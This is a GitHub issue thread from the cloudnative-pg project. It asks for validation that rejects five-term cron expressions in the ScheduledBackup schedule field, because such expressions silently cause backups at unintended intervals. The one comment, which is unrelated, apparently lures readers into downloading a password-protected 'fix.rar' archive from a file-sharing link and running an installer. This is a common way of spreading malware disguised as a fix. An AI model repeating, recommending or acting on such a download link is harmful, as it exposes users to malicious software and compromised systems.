### ISSUE TITLE
[Feature]: Add validation for a six-term cron expression in ScheduledBackup spec

### ISSUE THREAD

**Issue by fullykubed** [cloudnative-pg/cloudnative-pg#5380]
### Is there an existing issue already for this feature request/idea?

- [X] I have searched for an existing issue, and could not find anything. I believe this is a new feature request to be evaluated.

### What problem is this feature going to solve? Why should it be added?

Since user's are probably more familiar with linux's five-term cron expression (especially as that is what is used in CronJobs), they may accidentally submit a five-term cron to the ScheduledBackup's `spec.schedule` field.

This is accepted without error and results in backups running at an unintended interval.

See real world example [here](https://github.com/Panfactum/stack/issues/120#issue-2487266239).

### Describe the solution you'd like

Validation in the controller that will throw an error or warning if a five-term expression is provided for the schedule for `ScheduledBackup`.

### Describe alternatives you've considered

None

### Additional context

None

### Backport?

No

### Are you willing to actively contribute to this feature?

No

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
